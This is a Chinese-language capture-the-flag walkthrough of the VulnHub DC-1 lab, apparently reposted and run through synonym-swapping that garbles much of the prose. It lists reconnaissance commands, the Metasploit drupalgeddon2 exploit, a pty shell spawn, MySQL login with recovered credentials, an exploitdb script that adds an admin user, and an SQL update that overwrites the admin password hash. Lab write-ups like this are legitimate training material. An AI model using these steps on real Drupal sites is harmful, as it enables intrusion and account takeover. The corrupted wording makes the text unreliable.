|
|
<
1、靶机的状况拆配
进犯机(KALI):192.168.226.129
靶机(DC-1): 192.168.226.131(已知)
靶机所在:https://www.vulnhub.com/entry/dc-1,292/
2、战前筹办
请求:进犯机战靶机正在统一网段下,利用NAT形式
1、找到kali的IP所在,用nmap扫描统一网段找到靶机的IP
普通扫描出去的正在中心而129是kali的,以是能够肯定的是靶机的所在是192.168.226.131
经由过程mac所在也能肯定
2、IP所在拿到手让我们kk开放了哪些端心
- nmap -T4 -sV -O -A -p 80,445,22,139 192.168.226.131
- -T4(速率) -sV(版本扫描战开启的效劳) -O(操纵体系) -p-(局部端心)
复造代码
我们发明80、22、111端心、
80端心翻开以是能够会见网站 22号端心代表能够会见ssh效劳(长途毗连)
3、登录192.168.226.131
利用Firefox插件Wappalyzer检察到以下网页疑息
三年夜PHP CMS网站:Drupal、 Wordpress、Joomla
发明了3个主要疑息 效劳器接纳的是drupal内乱容办理体系且版本低,能够做为浸透的标的目的
因为没有明白账号暗码没有倡议接纳sql注进
4、检察网站目次
- dirb http://192.168.226.131
复造代码
5、当我们明白他是drupal的时分先来检察robots.txt有甚么有效的疑息
robots.txt 互联网品德和谈,商定爬虫哪些工具不克不及爬与,可是不克不及爬与也表露了哪些便是主要疑息,普通寄存正在根目次下
明白了Drupal的版本为7.X后,就能够开端举办缺点操纵了,Drupal 7.X版本有长途代码施行缺点
6、百度获知drupal7.x的版本缺点及进犯方法
3、开端浸透
1、flag1
翻开msf 输进msfconsole、搜刮search drupal缺点
- msfconsole 翻开msf
- search drupal 搜刮drupal破绽
复造代码
2、挑选2018年的载荷由第两部分的疑息搜集得出
检察需求设置的参数,yes的即为需求设置的,其他皆设置好了,正在那里只用设置RHOSTS
- use exploit/unix/webapp/drupal_drupalgeddon2
- show options 检察需求设置的参数,yes的即为需求设置的,其他皆设置好了,正在那里只用设置RHOSTS
复造代码
3、输进靶机IP所在,开端进犯
- set RHOSTS 192.168.226.131 靶机的IP
- exploit 开端施行
复造代码
4、获得meterpreter,具有了部门操控权限,让我们看看有甚么
找到了flag1翻开kk
翻译为 每一个好的CMS皆需求一个设置文件——您也是。
2、flag2
drupal的设置文件正在网站根目次下的/site/defaultx下的setting.php文件中
3、flag3
1、反弹shel的建造
正在那里我们找到了3样工具 flag2、提醒:最好没有要用暴力破解、数据库账号暗码
可是我们发明mysql不克不及间接利用
以是我们需求一个交互式shell、进进shell检察netstat -ano
我们检察到 3306号端心只许可当地会见,而3306是mysql的默许端心看去我们愈加得要获得一个交互式shell了,我们用python做一个反弹shell,假如施行没有了先退出shell(ctrl+c) 正在从头进进shell施行
- shell 启动shell 施行止号令
- python -c 'import pty;pty.spawn("/bin/bash")' 获得交互式shell,使其可施行MySQL语句
- mysql -udbuser -pR0ck3t 进进MySQL
复造代码
开端进进到mysql数据库内里来
2、检察办理员账户
- show databases; 显现一切数据库
- use drupaldb; 挑选当前数据库为dr库
- show tables; 显现以是数据表
- select * from users; 显现users表中一切内乱容,查找办理员账户
复造代码 我们发明了办理员账户可是暗码是明文减稀
3、修正办理员暗码
我们有两种办法,一种是增长一个办理员
正在exploitdb中有一个针对Drupal 7版本的进犯剧本,能够增长一个admin权限的用户账号
起首检察的是Drupal版本,肯定Drupal版本为7.24
- $ cat /var/www/includes/bootstrap.inc | grep VERSION 检察版本疑息
- searchsploit drupal 检察号令
- python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.226.131 -u admin2 -p admin2 开端增长办理员用户
复造代码
办法2、用drupal的减稀剧本减稀,剧本正在根目次下的scripts
起首退出MySQL,从头进进交互式shell,然后两段cd回到根目次,然后得到hash码
- ctrl+c 退出MySQL
- shell 进进shell
- python -c 'import pty; pty.spawn("/bin/bash")' 从头获得交互式shell
- php scripts/password-hash.sh admin1 前面的是您设置的暗码
复造代码
从头进进数据库改写暗码
[code]mysql -udbuser -pR0ck3t 进进MYSQLuse drupaldb; 进进数据库update drupaldb.users set pass="$S$DLIv1o1oUwharU.lo9EjQ7LEkmB9EDreSUHbWVH.A8mUO6o66LOc" where name="admin"; |
1、本网站属于个人的非赢利性网站,转载的文章遵循原作者的版权声明,如果原文没有版权声明,按照目前互联网开放的原则,我们将在不通知作者的情况下,转载文章;如果原文明确注明“禁止转载”,我们一定不会转载。如果我们转载的文章不符合作者的版权声明或者作者不想让我们转载您的文章的话,请您发送邮箱:Cdnjson@163.com提供相关证明,我们将积极配合您!
2、本网站转载文章仅为传播更多信息之目的,凡在本网站出现的信息,均仅供参考。本网站将尽力确保所提供信息的准确性及可靠性,但不保证信息的正确性和完整性,且不对因信息的不正确或遗漏导致的任何损失或损害承担责任。
3、任何透过本网站网页而链接及得到的资讯、产品及服务,本网站概不负责,亦不负任何法律责任。
4、本网站所刊发、转载的文章,其版权均归原作者所有,如其他媒体、网站或个人从本网下载使用,请在转载有关文章时务必尊重该文章的著作权,保留本网注明的“稿件来源”,并自负版权等法律责任。
|